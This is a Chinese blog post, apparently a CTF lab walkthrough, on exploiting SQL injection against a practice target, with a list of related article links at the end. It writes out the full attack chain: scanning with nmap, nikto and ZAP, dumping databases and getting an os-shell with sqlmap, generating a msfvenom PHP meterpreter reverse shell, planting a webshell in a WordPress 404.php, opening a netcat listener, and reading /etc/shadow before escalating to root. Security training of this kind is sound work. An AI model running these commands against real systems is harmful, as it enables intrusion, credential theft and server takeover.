CTF3之web安全SQL注入

最新推荐文章于 2023-12-09 16:59:30 发布
最新推荐文章于 2023-12-09 16:59:30 发布
阅读量289 收藏
点赞数
文章标签: web安全 sql 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52132147/article/details/132257954
版权

SQL注入漏洞

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

SQL注入的产生原因通常表现在以下几方面:
①不当的类型处理;
②不安全的数据库配置;
③不合理的查询集处理;
④不当的错误处理;
⑤转义字符处理不合适;
⑥多个提交处理不当。

任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数。

信息探测

扫描主机服务信息以及服务版本
– nmap -sV靶场IP地址
快速扫描主机全部信息
– nmap -T4 -A -v靶场IP地址
探测敏感信息
— nikto -host http:/ /靶场IP地址:端口
扫描主机开放的全部端口
– nmap -T4 -p- 靶场IP地址

深入探测

分析nmap、nikto扫描结果, 并对结果进行分析,挖掘可以利用的信息;
使用浏览器打开http:/ /ip:port/敏感页面,查看敏感信息,找到可利用的位置;

这里获得一个可以进行用户登录的信息,如下图,然后就可以在浏览器上打开这个ip。
在这里插入图片描述

漏洞扫描

挖掘一下系统中存在的漏洞,对系统进行漏洞扫描。

对于漏洞的扫描,可以使用以下工具:
web漏洞扫描器owasp-zap
OWASP ZAP攻击代理服务器是世界上最受欢迎的免费安全工具之一。ZAP可以帮助程序员在开发和测试应用程序过程中,自动发现Web应用程序中的安全漏洞。另外,它也是一款提供给具备丰富经验的渗透测试人员进行人工安全测试的优秀工具。

接下来,输入需要扫描的IP地址:
在这里插入图片描述

在扫描中,会先进行爬虫,将爬取的结果送到对应的位置。然后,对所爬取到的页面进行安全性检测,可以看到以下扫描的结果和信息:
在这里插入图片描述
当扫描完成后,会主动跳转到Alerts模块下。在此模块下,会看不同标志的小旗帜,若是深红色旗帜,就说明这样的界面存在高危漏洞,红色的旗帜就代表存在中危漏洞,浅黄色的旗帜代表低危漏洞。本文章主要是使用SQL注入来挖掘服务器中的用户名和密码。
在这里插入图片描述

漏洞利用

针对web进行漏洞扫描
对扫描的结果进行分析。注意:如果具有SQL注入漏洞,可以直接利用。毕竟SQL注入是高危漏洞,可以直接获取服务器权限。

使用sqlmap利用SQL注入漏洞(get)
– sqlmap -u url -dbs查看数据库名
– sqlmap -u url -D “数据库名” -tables 查看对应数据库中的数据表
– sqlmap -u url -D “ 数据库名” -T “表名" -columns查看对应字段
– sqlmap -u url -D “数据库名” -T “表名" -C “列名” -dump 查看对应字段的值
也可以直接尝试sqlmap -u url -os-shell 直接获取shell

获取用户名和密码:
在这里插入图片描述
登录系统后如下:
在这里插入图片描述
使用sqlmap利用SQL注入漏洞(post)
– sqlmap -r request.raw -level 5 -risk 3 - -dbs -dbms mysql --batch
– sqlmap -r request.raw -level 5 -risk 3 -D "数据库名” -tables 查看对应数据库中的数据表 --batch
– sq|map -r request.raw -level 5 -risk 3 -D "数据库名” -T "表名” - columns查看对应字段–batch
– sq|map -r request.raw -level 5 -risk 3 -D“数据库名” -T "表名” -C “列名” -dump --batch

如使用以下数据包来注入:
在这里插入图片描述

上传shell反弹权限

攻击机启动监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set Ihost 攻击机IP地址
msf exploit(handler) > set Iport 4444
msf exploit(handler) > run
生成反弹shell
msfvenom -p php/meterpreter/reverse_ tcp Ihost=攻击机IP地址 Iport= 4444 -f raw > /root/Desktop/shell.php

上传webshell获取控制权

wordpress后台寻找上传点
– 主题的404.php可以上传webshell
– webshell 获取/usr/share/webhells/php/

执行shell,获取反弹shell
http://靶场IP地址:端口号/目录/wp-content/theme/主题名/404.php

启动监听
– nc -nlvp port

启动终端
– python -c “import pty;pty.spawn('/bin/bash”)"

在终端,查看root权限
使用cat /etc/shadow cat /etc/ passwd查看敏感文件

使用su-提升root权限
找到对应的密码,查看对应root权限和目录下文件

总结

只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定完全正确。

Yuzurihaqi
关注
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 465
关于SQL注入的相关CTF笔记
CTF-Web-SQL注入
beihai2013
01-26 3289
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
CTF-SQL注入
weixin_44770698的博客
06-16 5196
CTF-SQL注入题目整理
CTF--SQL注入
woshisz0413的博客
11-27 381
SQL注入思路: 1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式: (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&&与||绕过过滤) 例:order by 1… SQL绕过过滤方式: (1)某一关键字被过滤:1...
CTF-Web SQL注入
weixin_52182264的博客
04-26 4340
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
CTFer成长之路之CTF中的SQL注入
天行健,君子以自强不息
02-20 1594
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF Web学习(四)----SQL注入
网络猿的博客
01-11 1519
CTF Web学习(四) SQL注入 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 CTF Web学习(三):python脚本的编写及应用 文章目录CTF Web学习(四)前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 818
CTFHUB SQL
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 431
个人CTF学习之路
ctf.show web 8 sql注入过滤了‘
m0_46412682的博客
07-14 960
ctf.show web 8 sql注入过滤了’ 开始的页面 提示是sql注入,第一步先试下 ’ or 1=1# 提示sql注入错误 第二步试下/**/替代空格,还是错误 第三步,去掉’单引号,成功,说明过滤了单引号 查看有多少字段,1/**/or/**/1=1/**/union/**/select/**/1,2,3#,但是这里又提示sql错误,这里可能过滤了select和union关键字 上脚本,这的脚本是网上找的 import requests s=requests.session() url='h
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1237
CTFHUB-WEB-SQL注入
CTF-10.sql注入(get)
woo233的博客
09-19 528
SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。
非常经典的一道SQL报错注入题目[极客大挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1583
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
CTF-sql注入
am_03的博客
08-23 106
在phpstudy里 #为注释 密码随便输入的 还可以输入admin’#(可注释掉) 注意:有的不让输入特殊字符,因为可以绕过验证 在URL处输入网址,在此工具里打开网页,可以点击右上方的扫描网址或者扫描URL 点击后,弹出的信息右键,点击SQL INJECTION POC, 在上方点击,可以获取它的web环境,数据库,命令执行,文件读取,文件上传等等 在下方点击获取信息可得到更多信息,弹出Version,Server,OS,u...
CTF中的SQL注入
weixin_43906500的博客
02-24 346
1 环境配置 见文章:https://blog.csdn.net/weixin_43906500/article/details/114025507 docker-compose.yml version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 命令执行 docker-compose up -d 2
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
最新发布
m0_73734159的博客
12-09 1060
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔注入(盲注)
CTF-SQL注入(Get)
su__xiaoyan的博客
12-22 816
SQL注入Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 实验环境 攻击者:Kali Linux(192.168.100.146) 靶机:VMware workstations Pro——Debian 6(32-bit)(192.168.100.132) 注意:当前靶机中并没有flag值,需要通过靶机上面的SQL注入漏洞获取数据库中的内容,登陆网站后台,利用网站
CTF-sql注入(X-Forwarded-For)
Reaches_r的博客
08-05 286
1.扫描目标IP发现只开了80http服务 2.进去有个登录界面,考虑sql注入得到账户密码 3.启动AWVS(AcunetixWeb Vulnarability Scanner)添加目标,扫描发现存在X-Forwarded-For注入漏洞 4.使用sqlmap注入攻击(--batch表示自动回应询问) (1)得到数据库名 (2)同理得到表名、列名,暴力破解出账户密码 5.登录后台,上传webshell,控制目标,具体步骤参考前面的文章。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值